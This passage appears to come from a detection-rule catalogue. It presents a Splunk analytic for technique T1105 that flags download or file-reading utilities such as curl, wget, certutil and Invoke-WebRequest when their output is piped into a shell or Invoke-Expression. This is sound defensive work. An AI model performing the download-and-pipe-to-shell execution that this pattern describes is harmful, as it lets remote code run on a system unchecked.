false positives should be limited, however filtering may be required.

Techniques

T1105

Sample rules

File Download or Read to Pipe Execution

source: splunk
technicques:
- T1105

Description

The following analytic detects the use of download or file reading utilities from Windows, Linux or MacOS to download or read the contents of a file from a remote or local source and pipe it directly to a shell for execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions. This activity is significant as it is commonly associated with malicious actions like coinminers and exploits such as CVE-2021-44228 in Log4j. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise and unauthorized access to sensitive data.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime

from datamodel=Endpoint.Processes where

``` This aims to cover download utilities and file reading ones ```

Processes.process IN (
  "*.DownloadFile(*",
  "*.DownloadString(*",
  "*ASCII.GetString*",
  "*bitsadmin*",
  "*certutil*",
  "*curl*",
  "*Invoke-RestMethod*",
  "*Invoke-WebRequest*",
  "*irm*",
  "*iwr *",
  "*mshta*",
  "*wget*"
)

Processes.process IN ("*
|*")

(
  ``` Linux / MacOS ```
  Processes.process IN (
    "*bash*",
    "*csh*",
    "*dash*",
    "*fish*",
    "*ksh*",
    "*rbash*",
    "*tcsh*",
    "*zsh*"
  )
  OR
  ``` Because the "sh" string can overlap and is a short atom we treat it in a special case ```
  Processes.process IN (
    "*
|sh"
    "* sh*"
  )
  OR
  ``` Windows ```
  Processes.process IN ("*IEX*", "*Invoke-Expression*")
)

by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
   Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
   Processes.parent_process_name Processes.parent_process_path Processes.process
   Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id
   Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user
   Processes.user_id Processes.vendor_product


| `drop_dm_object_name(Processes)`

| `security_content_ctime(firstTime)`

| `security_content_ctime(lastTime)`

| `file_download_or_read_to_pipe_execution_filter`